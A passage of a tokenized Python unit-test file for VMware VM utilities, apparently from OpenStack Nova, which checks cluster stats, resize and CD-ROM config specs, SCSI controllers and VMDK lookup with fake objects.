op|'('
string|'"prop_list_host1"'
op|','
nl|'\n'
name|'prop_list_host_2'
op|')'
op|')'
newline|'\n'
nl|'\n'
name|'respool_resource_usage'
op|'='
name|'fake'
op|'.'
name|'DataObject'
op|'('
op|')'
newline|'\n'
name|'respool_resource_usage'
op|'.'
name|'maxUsage'
op|'='
number|'5368709120'
newline|'\n'
name|'respool_resource_usage'
op|'.'
name|'overallUsage'
op|'='
number|'2147483648'
newline|'\n'
nl|'\n'
DECL|function|fake_call_method
name|'def'
name|'fake_call_method'
op|'('
op|'*'
name|'args'
op|')'
op|':'
newline|'\n'
indent|' '
name|'if'
string|'"get_object_properties_dict"'
name|'in'
name|'args'
op|':'
newline|'\n'
indent|' '
name|'return'
name|'prop_dict'
newline|'\n'
dedent|''
name|'elif'
string|'"get_properties_for_a_collection_of_objects"'
name|'in'
name|'args'
op|':'
newline|'\n'
indent|' '
name|'return'
name|'fake_objects'
newline|'\n'
dedent|''
name|'else'
op|':'
newline|'\n'
indent|' '
name|'return'
name|'respool_resource_usage'
newline|'\n'
nl|'\n'
dedent|''
dedent|''
name|'session'
op|'='
name|'fake'
op|'.'
name|'FakeSession'
op|'('
op|')'
newline|'\n'
name|'with'
name|'mock'
op|'.'
name|'patch'
op|'.'
name|'object'
op|'('
name|'session'
op|','
string|"'_call_method'"
op|','
name|'fake_call_method'
op|')'
op|':'
newline|'\n'
indent|' '
name|'result'
op|'='
name|'vm_util'
op|'.'
name|'get_stats_from_cluster'
op|'('
name|'session'
op|','
string|'"cluster1"'
op|')'
newline|'\n'
name|'mem_info'
op|'='
op|'{'
op|'}'
newline|'\n'
name|'if'
name|'connection_state'
op|'=='
string|'"connected"'
name|'and'
name|'not'
name|'maintenance_mode'
op|':'
newline|'\n'
indent|' '
name|'vcpus'
op|'='
number|'32'
newline|'\n'
dedent|''
name|'else'
op|':'
newline|'\n'
indent|' '
name|'vcpus'
op|'='
number|'16'
newline|'\n'
dedent|''
name|'mem_info'
op|'['
string|"'total'"
op|']'
op|'='
number|'5120'
newline|'\n'
name|'mem_info'
op|'['
string|"'free'"
op|']'
op|'='
number|'3072'
newline|'\n'
name|'expected_stats'
op|'='
op|'{'
string|"'vcpus'"
op|':'
name|'vcpus'
op|','
string|"'mem'"
op|':'
name|'mem_info'
op|'}'
newline|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
name|'expected_stats'
op|','
name|'result'
op|')'
newline|'\n'
nl|'\n'
DECL|member|test_get_stats_from_cluster_hosts_connected_and_active
dedent|''
dedent|''
name|'def'
name|'test_get_stats_from_cluster_hosts_connected_and_active'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
indent|' '
name|'self'
op|'.'
name|'_test_get_stats_from_cluster'
op|'('
op|')'
newline|'\n'
nl|'\n'
DECL|member|test_get_stats_from_cluster_hosts_disconnected_and_active
dedent|''
name|'def'
name|'test_get_stats_from_cluster_hosts_disconnected_and_active'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
indent|' '
name|'self'
op|'.'
name|'_test_get_stats_from_cluster'
op|'('
name|'connection_state'
op|'='
string|'"disconnected"'
op|')'
newline|'\n'
nl|'\n'
DECL|member|test_get_stats_from_cluster_hosts_connected_and_maintenance
dedent|''
name|'def'
name|'test_get_stats_from_cluster_hosts_connected_and_maintenance'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
indent|' '
name|'self'
op|'.'
name|'_test_get_stats_from_cluster'
op|'('
name|'maintenance_mode'
op|'='
name|'True'
op|')'
newline|'\n'
nl|'\n'
DECL|member|test_get_host_ref_no_hosts_in_cluster
dedent|''
name|'def'
name|'test_get_host_ref_no_hosts_in_cluster'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
indent|' '
name|'self'
op|'.'
name|'assertRaises'
op|'('
name|'exception'
op|'.'
name|'NoValidHost'
op|','
nl|'\n'
name|'vm_util'
op|'.'
name|'get_host_ref'
op|','
nl|'\n'
name|'fake'
op|'.'
name|'FakeObjectRetrievalSession'
op|'('
string|'""'
op|')'
op|','
string|"'fake_cluster'"
op|')'
newline|'\n'
nl|'\n'
DECL|member|test_get_resize_spec
dedent|''
name|'def'
name|'test_get_resize_spec'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
indent|' '
name|'vcpus'
op|'='
number|'2'
newline|'\n'
name|'memory_mb'
op|'='
number|'2048'
newline|'\n'
name|'extra_specs'
op|'='
name|'vm_util'
op|'.'
name|'ExtraSpecs'
op|'('
op|')'
newline|'\n'
name|'fake_factory'
op|'='
name|'fake'
op|'.'
name|'FakeFactory'
op|'('
op|')'
newline|'\n'
name|'result'
op|'='
name|'vm_util'
op|'.'
name|'get_vm_resize_spec'
op|'('
name|'fake_factory'
op|','
nl|'\n'
name|'vcpus'
op|','
name|'memory_mb'
op|','
name|'extra_specs'
op|')'
newline|'\n'
name|'expected'
op|'='
name|'fake_factory'
op|'.'
name|'create'
op|'('
string|"'ns0:VirtualMachineConfigSpec'"
op|')'
newline|'\n'
name|'expected'
op|'.'
name|'memoryMB'
op|'='
name|'memory_mb'
newline|'\n'
name|'expected'
op|'.'
name|'numCPUs'
op|'='
name|'vcpus'
newline|'\n'
name|'cpuAllocation'
op|'='
name|'fake_factory'
op|'.'
name|'create'
op|'('
string|"'ns0:ResourceAllocationInfo'"
op|')'
newline|'\n'
name|'cpuAllocation'
op|'.'
name|'reservation'
op|'='
number|'0'
newline|'\n'
name|'cpuAllocation'
op|'.'
name|'limit'
op|'='
op|'-'
number|'1'
newline|'\n'
name|'cpuAllocation'
op|'.'
name|'shares'
op|'='
name|'fake_factory'
op|'.'
name|'create'
op|'('
string|"'ns0:SharesInfo'"
op|')'
newline|'\n'
name|'cpuAllocation'
op|'.'
name|'shares'
op|'.'
name|'level'
op|'='
string|"'normal'"
newline|'\n'
name|'cpuAllocation'
op|'.'
name|'shares'
op|'.'
name|'shares'
op|'='
number|'0'
newline|'\n'
name|'expected'
op|'.'
name|'cpuAllocation'
op|'='
name|'cpuAllocation'
newline|'\n'
nl|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
name|'expected'
op|','
name|'result'
op|')'
newline|'\n'
nl|'\n'
DECL|member|test_get_resize_spec_with_limits
dedent|''
name|'def'
name|'test_get_resize_spec_with_limits'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
indent|' '
name|'vcpus'
op|'='
number|'2'
newline|'\n'
name|'memory_mb'
op|'='
number|'2048'
newline|'\n'
name|'cpu_limits'
op|'='
name|'vm_util'
op|'.'
name|'Limits'
op|'('
name|'limit'
op|'='
number|'7'
op|','
nl|'\n'
name|'reservation'
op|'='
number|'6'
op|')'
newline|'\n'
name|'extra_specs'
op|'='
name|'vm_util'
op|'.'
name|'ExtraSpecs'
op|'('
name|'cpu_limits'
op|'='
name|'cpu_limits'
op|')'
newline|'\n'
name|'fake_factory'
op|'='
name|'fake'
op|'.'
name|'FakeFactory'
op|'('
op|')'
newline|'\n'
name|'result'
op|'='
name|'vm_util'
op|'.'
name|'get_vm_resize_spec'
op|'('
name|'fake_factory'
op|','
nl|'\n'
name|'vcpus'
op|','
name|'memory_mb'
op|','
name|'extra_specs'
op|')'
newline|'\n'
name|'expected'
op|'='
name|'fake_factory'
op|'.'
name|'create'
op|'('
string|"'ns0:VirtualMachineConfigSpec'"
op|')'
newline|'\n'
name|'expected'
op|'.'
name|'memoryMB'
op|'='
name|'memory_mb'
newline|'\n'
name|'expected'
op|'.'
name|'numCPUs'
op|'='
name|'vcpus'
newline|'\n'
name|'cpuAllocation'
op|'='
name|'fake_factory'
op|'.'
name|'create'
op|'('
string|"'ns0:ResourceAllocationInfo'"
op|')'
newline|'\n'
name|'cpuAllocation'
op|'.'
name|'reservation'
op|'='
number|'6'
newline|'\n'
name|'cpuAllocation'
op|'.'
name|'limit'
op|'='
number|'7'
newline|'\n'
name|'cpuAllocation'
op|'.'
name|'shares'
op|'='
name|'fake_factory'
op|'.'
name|'create'
op|'('
string|"'ns0:SharesInfo'"
op|')'
newline|'\n'
name|'cpuAllocation'
op|'.'
name|'shares'
op|'.'
name|'level'
op|'='
string|"'normal'"
newline|'\n'
name|'cpuAllocation'
op|'.'
name|'shares'
op|'.'
name|'shares'
op|'='
number|'0'
newline|'\n'
name|'expected'
op|'.'
name|'cpuAllocation'
op|'='
name|'cpuAllocation'
newline|'\n'
nl|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
name|'expected'
op|','
name|'result'
op|')'
newline|'\n'
nl|'\n'
DECL|member|test_get_cdrom_attach_config_spec
dedent|''
name|'def'
name|'test_get_cdrom_attach_config_spec'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
indent|' '
name|'fake_factory'
op|'='
name|'fake'
op|'.'
name|'FakeFactory'
op|'('
op|')'
newline|'\n'
name|'datastore'
op|'='
name|'fake'
op|'.'
name|'Datastore'
op|'('
op|')'
newline|'\n'
name|'result'
op|'='
name|'vm_util'
op|'.'
name|'get_cdrom_attach_config_spec'
op|'('
name|'fake_factory'
op|','
nl|'\n'
name|'datastore'
op|','
nl|'\n'
string|'"/tmp/foo.iso"'
op|','
nl|'\n'
number|'200'
op|','
number|'0'
op|')'
newline|'\n'
name|'expected'
op|'='
name|'fake_factory'
op|'.'
name|'create'
op|'('
string|"'ns0:VirtualMachineConfigSpec'"
op|')'
newline|'\n'
name|'expected'
op|'.'
name|'deviceChange'
op|'='
op|'['
op|']'
newline|'\n'
name|'device_change'
op|'='
name|'fake_factory'
op|'.'
name|'create'
op|'('
string|"'ns0:VirtualDeviceConfigSpec'"
op|')'
newline|'\n'
name|'device_change'
op|'.'
name|'operation'
op|'='
string|"'add'"
newline|'\n'
nl|'\n'
name|'device_change'
op|'.'
name|'device'
op|'='
name|'fake_factory'
op|'.'
name|'create'
op|'('
string|"'ns0:VirtualCdrom'"
op|')'
newline|'\n'
name|'device_change'
op|'.'
name|'device'
op|'.'
name|'controllerKey'
op|'='
number|'200'
newline|'\n'
name|'device_change'
op|'.'
name|'device'
op|'.'
name|'unitNumber'
op|'='
number|'0'
newline|'\n'
name|'device_change'
op|'.'
name|'device'
op|'.'
name|'key'
op|'='
op|'-'
number|'1'
newline|'\n'
nl|'\n'
name|'connectable'
op|'='
name|'fake_factory'
op|'.'
name|'create'
op|'('
string|"'ns0:VirtualDeviceConnectInfo'"
op|')'
newline|'\n'
name|'connectable'
op|'.'
name|'allowGuestControl'
op|'='
name|'False'
newline|'\n'
name|'connectable'
op|'.'
name|'startConnected'
op|'='
name|'True'
newline|'\n'
name|'connectable'
op|'.'
name|'connected'
op|'='
name|'True'
newline|'\n'
name|'device_change'
op|'.'
name|'device'
op|'.'
name|'connectable'
op|'='
name|'connectable'
newline|'\n'
nl|'\n'
name|'backing'
op|'='
name|'fake_factory'
op|'.'
name|'create'
op|'('
string|"'ns0:VirtualCdromIsoBackingInfo'"
op|')'
newline|'\n'
name|'backing'
op|'.'
name|'fileName'
op|'='
string|"'/tmp/foo.iso'"
newline|'\n'
name|'backing'
op|'.'
name|'datastore'
op|'='
name|'datastore'
newline|'\n'
name|'device_change'
op|'.'
name|'device'
op|'.'
name|'backing'
op|'='
name|'backing'
newline|'\n'
name|'expected'
op|'.'
name|'deviceChange'
op|'.'
name|'append'
op|'('
name|'device_change'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
name|'expected'
op|','
name|'result'
op|')'
newline|'\n'
nl|'\n'
DECL|member|test_lsilogic_controller_spec
dedent|''
name|'def'
name|'test_lsilogic_controller_spec'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
comment|'# Test controller spec returned for lsiLogic sas adapter type'
nl|'\n'
indent|' '
name|'config_spec'
op|'='
name|'vm_util'
op|'.'
name|'create_controller_spec'
op|'('
name|'fake'
op|'.'
name|'FakeFactory'
op|'('
op|')'
op|','
op|'-'
number|'101'
op|','
nl|'\n'
name|'adapter_type'
op|'='
name|'constants'
op|'.'
name|'ADAPTER_TYPE_LSILOGICSAS'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
string|'"ns0:VirtualLsiLogicSASController"'
op|','
nl|'\n'
name|'config_spec'
op|'.'
name|'device'
op|'.'
name|'obj_name'
op|')'
newline|'\n'
nl|'\n'
DECL|member|test_paravirtual_controller_spec
dedent|''
name|'def'
name|'test_paravirtual_controller_spec'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
comment|'# Test controller spec returned for paraVirtual adapter type'
nl|'\n'
indent|' '
name|'config_spec'
op|'='
name|'vm_util'
op|'.'
name|'create_controller_spec'
op|'('
name|'fake'
op|'.'
name|'FakeFactory'
op|'('
op|')'
op|','
op|'-'
number|'101'
op|','
nl|'\n'
name|'adapter_type'
op|'='
name|'constants'
op|'.'
name|'ADAPTER_TYPE_PARAVIRTUAL'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
string|'"ns0:ParaVirtualSCSIController"'
op|','
nl|'\n'
name|'config_spec'
op|'.'
name|'device'
op|'.'
name|'obj_name'
op|')'
newline|'\n'
nl|'\n'
DECL|member|test_create_controller_spec_with_specfic_bus_number
dedent|''
name|'def'
name|'test_create_controller_spec_with_specfic_bus_number'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
comment|'# Test controller spec with specifc bus number rather default 0'
nl|'\n'
indent|' '
name|'config_spec'
op|'='
name|'vm_util'
op|'.'
name|'create_controller_spec'
op|'('
name|'fake'
op|'.'
name|'FakeFactory'
op|'('
op|')'
op|','
op|'-'
number|'101'
op|','
nl|'\n'
name|'adapter_type'
op|'='
name|'constants'
op|'.'
name|'ADAPTER_TYPE_LSILOGICSAS'
op|','
nl|'\n'
name|'bus_number'
op|'='
number|'1'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
number|'1'
op|','
name|'config_spec'
op|'.'
name|'device'
op|'.'
name|'busNumber'
op|')'
newline|'\n'
nl|'\n'
DECL|member|_vmdk_path_and_adapter_type_devices
dedent|''
name|'def'
name|'_vmdk_path_and_adapter_type_devices'
op|'('
name|'self'
op|','
name|'filename'
op|','
name|'parent'
op|'='
name|'None'
op|')'
op|':'
newline|'\n'
comment|'# Test the adapter_type returned for a lsiLogic sas controller'
nl|'\n'
indent|' '
name|'controller_key'
op|'='
number|'1000'
newline|'\n'
name|'disk'
op|'='
name|'fake'
op|'.'
name|'VirtualDisk'
op|'('
op|')'
newline|'\n'
name|'disk'
op|'.'
name|'controllerKey'
op|'='
name|'controller_key'
newline|'\n'
name|'disk_backing'
op|'='
name|'fake'
op|'.'
name|'VirtualDiskFlatVer2BackingInfo'
op|'('
op|')'
newline|'\n'
name|'disk_backing'
op|'.'
name|'fileName'
op|'='
name|'filename'
newline|'\n'
name|'disk'
op|'.'
name|'capacityInBytes'
op|'='
number|'1024'
newline|'\n'
name|'if'
name|'parent'
op|':'
newline|'\n'
indent|' '
name|'disk_backing'
op|'.'
name|'parent'
op|'='
name|'parent'
newline|'\n'
dedent|''
name|'disk'
op|'.'
name|'backing'
op|'='
name|'disk_backing'
newline|'\n'
comment|'# Ephemeral disk'
nl|'\n'
name|'e_disk'
op|'='
name|'fake'
op|'.'
name|'VirtualDisk'
op|'('
op|')'
newline|'\n'
name|'e_disk'
op|'.'
name|'controllerKey'
op|'='
name|'controller_key'
newline|'\n'
name|'disk_backing'
op|'='
name|'fake'
op|'.'
name|'VirtualDiskFlatVer2BackingInfo'
op|'('
op|')'
newline|'\n'
name|'disk_backing'
op|'.'
name|'fileName'
op|'='
string|"'[test_datastore] uuid/ephemeral_0.vmdk'"
newline|'\n'
name|'e_disk'
op|'.'
name|'capacityInBytes'
op|'='
number|'512'
newline|'\n'
name|'e_disk'
op|'.'
name|'backing'
op|'='
name|'disk_backing'
newline|'\n'
name|'controller'
op|'='
name|'fake'
op|'.'
name|'VirtualLsiLogicSASController'
op|'('
op|')'
newline|'\n'
name|'controller'
op|'.'
name|'key'
op|'='
name|'controller_key'
newline|'\n'
name|'devices'
op|'='
op|'['
name|'disk'
op|','
name|'e_disk'
op|','
name|'controller'
op|']'
newline|'\n'
name|'return'
name|'devices'
newline|'\n'
nl|'\n'
DECL|member|test_get_vmdk_path_and_adapter_type
dedent|''
name|'def'
name|'test_get_vmdk_path_and_adapter_type'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
indent|' '
name|'filename'
op|'='
string|"'[test_datastore] uuid/uuid.vmdk'"
newline|'\n'
name|'devices'
op|'='
name|'self'
op|'.'
name|'_vmdk_path_and_adapter_type_devices'
op|'('
name|'filename'
op|')'
newline|'\n'
name|'session'
op|'='
name|'fake'
op|'.'
name|'FakeSession'
op|'('
op|')'
newline|'\n'
name|'with'
name|'mock'
op|'.'
name|'patch'
op|'.'
name|'object'
op|'('
name|'session'
op|','
string|"'_call_method'"
op|','
name|'return_value'
op|'='
name|'devices'
op|')'
op|':'
newline|'\n'
indent|' '
name|'vmdk'
op|'='
name|'vm_util'
op|'.'
name|'get_vmdk_info'
op|'('
name|'session'
op|','
name|'None'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
name|'constants'
op|'.'
name|'ADAPTER_TYPE_LSILOGICSAS'
op|','
nl|'\n'
name|'vmdk'
op|'.'
name|'adapter_type'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
string|"'[test_datastore] uuid/ephemeral_0.vmdk'"
op|','
nl|'\n'
name|'vmdk'
op|'.'
name|'path'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
number|'512'
op|','
name|'vmdk'
op|'.'
name|'capacity_in_bytes'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
name|'devices'
op|'['
number|'1'
op|']'
op|','
name|'vmdk'
op|'.'
name|'device'
op|')'
newline|'\n'
nl|'\n'
DECL|member|test_get_vmdk_path_and_adapter_type_with_match
dedent|''
dedent|''
name|'def'
name|'test_get_vmdk_path_and_adapter_type_with_match'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
indent|' '
name|'n_filename'
op|'='
string|"'[test_datastore] uuid/uuid.vmdk'"
newline|'\n'
name|'devices'
op|'='
name|'self'
op|'.'
name|'_vmdk_path_and_adapter_type_devices'
op|'('
name|'n_filename'
op|')'
newline|'\n'
name|'session'
op|'='
name|'fake'
op|'.'
name|'FakeSession'
op|'('
op|')'
newline|'\n'
name|'with'
name|'mock'
op|'.'
name|'patch'
op|'.'
name|'object'
op|'('
name|'session'
op|','
string|"'_call_method'"
op|','
name|'return_value'
op|'='
name|'devices'
op|')'
op|':'
newline|'\n'
indent|' '
name|'vmdk'
op|'='
name|'vm_util'
op|'.'
name|'get_vmdk_info'
op|'('
name|'session'
op|','
name|'None'
op|','
name|'uuid'
op|'='
string|"'uuid'"
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
name|'constants'
op|'.'
name|'ADAPTER_TYPE_LSILOGICSAS'
op|','
nl|'\n'
name|'vmdk'
op|'.'
name|'adapter_type'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
name|'n_filename'
op|','
name|'vmdk'
op|'.'
name|'path'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
number|'1024'
op|','
name|'vmdk'
op|'.'
name|'capacity_in_bytes'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
name|'devices'
op|'['
number|'0'
op|']'
op|','
name|'vmdk'
op|'.'
name|'device'
op|')'
newline|'\n'
nl|'\n'
DECL|member|test_get_vmdk_path_and_adapter_type_with_nomatch
dedent|''
dedent|''
name|'def'
name|'test_get_vmdk_path_and_adapter_type_with_nomatch'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
indent|' '
name|'n_filename'
op|'='
string|"'[test_datastore] diuu/diuu.vmdk'"
newline|'\n'
name|'session'
op|'='
name|'fake'
op|'.'
name|'FakeSession'
op|'('
op|')'
newline|'\n'
name|'devices'
op|'='
name|'self'
op|'.'
name|'_vmdk_path_and_adapter_type_devices'
op|'('
name|'n_filename'
op|')'
newline|'\n'
name|'with'
name|'mock'
op|'.'
name|'patch'
op|'.'
name|'object'
op|'('
name|'session'
op|','
string|"'_call_method'"
op|','
name|'return_value'
op|'='
name|'devices'
op|')'
op|':'
newline|'\n'
indent|' '
name|'vmdk'
op|'='
name|'vm_util'
op|'.'
name|'get_vmdk_info'
op|'('
name|'session'
op|','
name|'None'
op|','
name|'uuid'
op|'='
string|"'uuid'"
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertIsNone'
op|'('
name|'vmdk'
op|'.'
name|'adapter_type'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertIsNone'
op|'('
name|'vmdk'
op|'.'
name|'path'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
number|'0'
op|','
name|'vmdk'
op|'.'
name|'capacity_in_bytes'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertIsNone'
op|'('
name|'vmdk'
op|'.'
name|'device'
op|')'
newline|'\n'
nl|'\n'
DECL|member|test_get_vmdk_adapter_type
dedent|''
dedent|''
name|'def'
name|'test_get_vmdk_adapter_type'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
comment|'# Test for the adapter_type to be used in vmdk descriptor'
nl|'\n'
comment|'# Adapter type in vmdk descriptor is same for LSI-SAS, LSILogic'
nl|'\n'
comment|'# and ParaVirtual'
nl|'\n'
indent|' '
name|'vmdk_adapter_type'
op|'='
name|'vm_util'
op|'.'
name|'get_vmdk_adapter_type'
op|'('
nl|'\n'
name|'constants'
op|'.'
name|'DEFAULT_ADAPTER_TYPE'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
name|'constants'
op|'.'
name|'DEFAULT_ADAPTER_TYPE'
op|','
name|'vmdk_adapter_type'
op|')'
newline|'\n'
name|'vmdk_adapter_type'
op|'='
name|'vm_util'
op|'.'
name|'get_vmdk_adapter_type'
op|'('
nl|'\n'
name|'constants'
op|'.'
name|'ADAPTER_TYPE_LSILOGICSAS'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
name|'constants'
op|'.'
name|'DEFAULT_ADAPTER_TYPE'
op|','
name|'vmdk_adapter_type'
op|')'
newline|'\n'
name|'vmdk_adapter_type'
op|'='
name|'vm_util'
op|'.'
name|'get_vmdk_adapter_type'
op|'('
nl|'\n'
name|'constants'
op|'.'
name|'ADAPTER_TYPE_PARAVIRTUAL'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
name|'constants'
op|'.'
name|'DEFAULT_ADAPTER_TYPE'
op|','
name|'vmdk_adapter_type'
op|')'
newline|'\n'
name|'vmdk_adapter_type'
op|'='
name|'vm_util'
op|'.'
name|'get_vmdk_adapter_type'
op|'('
string|'"dummyAdapter"'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
string|'"dummyAdapter"'
op|','
name|'vmdk_adapter_type'
op|')'
newline|'\n'
nl|'\n'
DECL|member|test_get_scsi_adapter_type
dedent|''
name|'def'
name|'test_get_scsi_adapter_type'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
indent|' '
name|'vm'
op|'='
name|'fake'
op|'.'
name|'VirtualMachine'
op|'('
op|')'
newline|'\n'
name|'devices'
op|'='
name|'vm'
op|'.'
name|'get'
op|'('
string|'"config.hardware.device"'
op|')'
op|'.'
name|'VirtualDevice'
newline|'\n'
name|'scsi_controller'
op|'='
name|'fake'
op|'.'
name|'VirtualLsiLogicController'
op|'('
op|')'
newline|'\n'
name|'ide_controller'
op|'='
name|'fake'
op|'.'
name|'VirtualIDEController'
op|'('
op|')'
newline|'\n'
name|'devices'
op|'.'
name|'append'
op|'('
name|'scsi_controller'
op|')'
newline|'\n'
name|'devices'
op|'.'
name|'append'
op|'('
name|'ide_controller'
op|')'
newline|'\n'
name|'fake'
op|'.'
name|'_update_object'
op|'('
string|'"VirtualMachine"'
op|','
name|'vm'
op|')'
newline|'\n'
comment|'# return the scsi type, not ide'
nl|'\n'
name|'hardware_device'
op|'='
name|'vm'
op|'.'
name|'get'
op|'('
string|'"config.hardware.device"'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
name|'constants'
op|'.'
name|'DEFAULT_ADAPTER_TYPE'
op|','
nl|'\n'
name|'vm_util'
op|'.'
name|'get_scsi_adapter_type'
op|'('
name|'hardware_device'
op|')'
op|')'
newline|'\n'
nl|'\n'
DECL|member|test_get_scsi_adapter_type_with_error
dedent|''
name|'def'
name|'test_get_scsi_adapter_type_with_error'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
indent|' '
name|'vm'
op|'='
name|'fake'
op|'.'
name|'VirtualMachine'
op|'('
op|')'
newline|'\n'
name|'devices'
op|'='
name|'vm'
op|'.'
name|'get'
op|'('
string|'"config.hardware.device"'
op|')'
op|'.'
name|'VirtualDevice'
newline|'\n'
name|'scsi_controller'
op|'='
name|'fake'
op|'.'
name|'VirtualLsiLogicController'
op|'('
op|')'
newline|'\n'
name|'ide_controller'
op|'='
name|'fake'
op|'.'
name|'VirtualIDEController'
op|'('
op|')'
newline|'\n'
name|'devices'
op|'.'
name|'append'
op|'('
name|'scsi_controller'
op|')'
newline|'\n'
name|'devices'
op|'.'
name|'append'
op|'('
name|'ide_controller'
op|')'
newline|'\n'
name|'fake'
op|'.'
name|'_update_object'
op|'('
string|'"VirtualMachine"'
op|','
name|'vm'
op|')'
newline|'\n'
comment|'# the controller is not suitable since the device under this controller'
nl|'\n'
comment|'# has exceeded SCSI_MAX_CONNECT_NUMBER'
nl|'\n'
name|'for'
name|'i'
name|'in'
name|'range'
op|'('
number|'0'
op|','
name|'constants'
op|'.'
name|'SCSI_MAX_CONNECT_NUMBER'
op|')'
op|':'
newline|'\n'
indent|' '
name|'scsi_controller'
op|'.'
name|'device'
op|'.'
name|'append'
op|'('
string|"'device'"
op|'+'
name|'str'
op|'('
name|'i'
op|')'
op|')'
newline|'\n'
dedent|''
name|'hardware_device'
op|'='
name|'vm'
op|'.'
name|'get'
op|'('
string|'"config.hardware.device"'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertRaises'
op|'('
name|'exception'
op|'.'
name|'StorageError'
op|','
nl|'\n'
name|'vm_util'
op|'.'
name|'get_scsi_adapter_type'
op|','
nl|'\n'
name|'hardware_device'
op|')'
newline|'\n'
nl|'\n'
DECL|member|test_find_allocated_slots
dedent|''
name|'def'
name|'test_find_allocated_slots'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
indent|' '
name|'disk1'
op|'='
name|'fake'
op|'.'
name|'VirtualDisk'
op|'('
number|'200'
op|','
number|'0'
op|')'
newline|'\n'
name|'disk2'
op|'='
name|'fake'
op|'.'
name|'VirtualDisk'
op|'('
number|'200'
op|','
number|'1'
op|')'
newline|'\n'
name|'disk3'
op|'='
name|'fake'
op|'.'
name|'VirtualDisk'
op|'('
number|'201'
op|','
number|'1'
op|')'
newline|'\n'
name|'ide0'
op|'='
name|'fake'
op|'.'
name|'VirtualIDEController'
op|'('
number|'200'
op|')'
newline|'\n'
name|'ide1'
op|'='
name|'fake'
op|'.'
name|'VirtualIDEController'
op|'('
number|'201'
op|')'
newline|'\n'
name|'scsi0'
op|'='
name|'fake'
op|'.'
name|'VirtualLsiLogicController'
op|'('
name|'key'
op|'='
number|'1000'
op|','
name|'scsiCtlrUnitNumber'
op|'='
number|'7'
op|')'
newline|'\n'
name|'devices'
op|'='
op|'['
name|'disk1'
op|','
name|'disk2'
op|','
name|'disk3'
op|','
name|'ide0'
op|','
name|'ide1'
op|','
name|'scsi0'
op|']'
newline|'\n'
name|'taken'
op|'='
name|'vm_util'
op|'.'
name|'_find_allocated_slots'
op|'('
name|'devices'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
op|'['
number|'0'
op|','
number|'1'
op|']'
op|','
name|'sorted'
op|'('
name|'taken'
op|'['
number|'200'
op|']'
op|')'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
op|'['
number|'1'
op|']'
op|','
name|'taken'
op|'['
number|'201'
op|']'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
op|'['
number|'7'
op|']'
op|','
name|'taken'
op|'['
number|'1000'
op|']'
op|')'
newline|'\n'
nl|'\n'
DECL|member|test_get_bus_number_for_scsi_controller
dedent|''
name|'def'
name|'test_get_bus_number_for_scsi_controller'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
indent|' '
name|'devices'
op|'='
op|'['
name|'fake'
op|'.'
name|'VirtualLsiLogicController'
op|'('
number|'1000'
op|','
name|'scsiCtlrUnitNumber'
op|'='
number|'7'
op|','
nl|'\n'
name|'busNumber'
op|'='
number|'0'
op|')'
op|','
nl|'\n'
name|'fake'
op|'.'
name|'VirtualLsiLogicController'
op|'('
number|'1002'
op|','
name|'scsiCtlrUnitNumber'
op|'='
number|'7'
op|','
nl|'\n'
name|'busNumber'
op|'='
number|'2'
op|')'
op|']'
newline|'\n'
name|'bus_number'
op|'='
name|'vm_util'
op|'.'
name|'_get_bus_number_for_scsi_controller'
op|'('
name|'devices'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
number|'1'
op|','
name|'bus_number'
op|')'
newline|'\n'
nl|'\n'
DECL|member|test_get_bus_number_for_scsi_controller_buses_used_up
dedent|''
name|'def'
name|'test_get_bus_number_for_scsi_controller_buses_used_up'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
indent|' '
name|'devices'
op|'='
op|'['
name|'fake'
op|'.'
name|'VirtualLsiLogicController'
op|'('
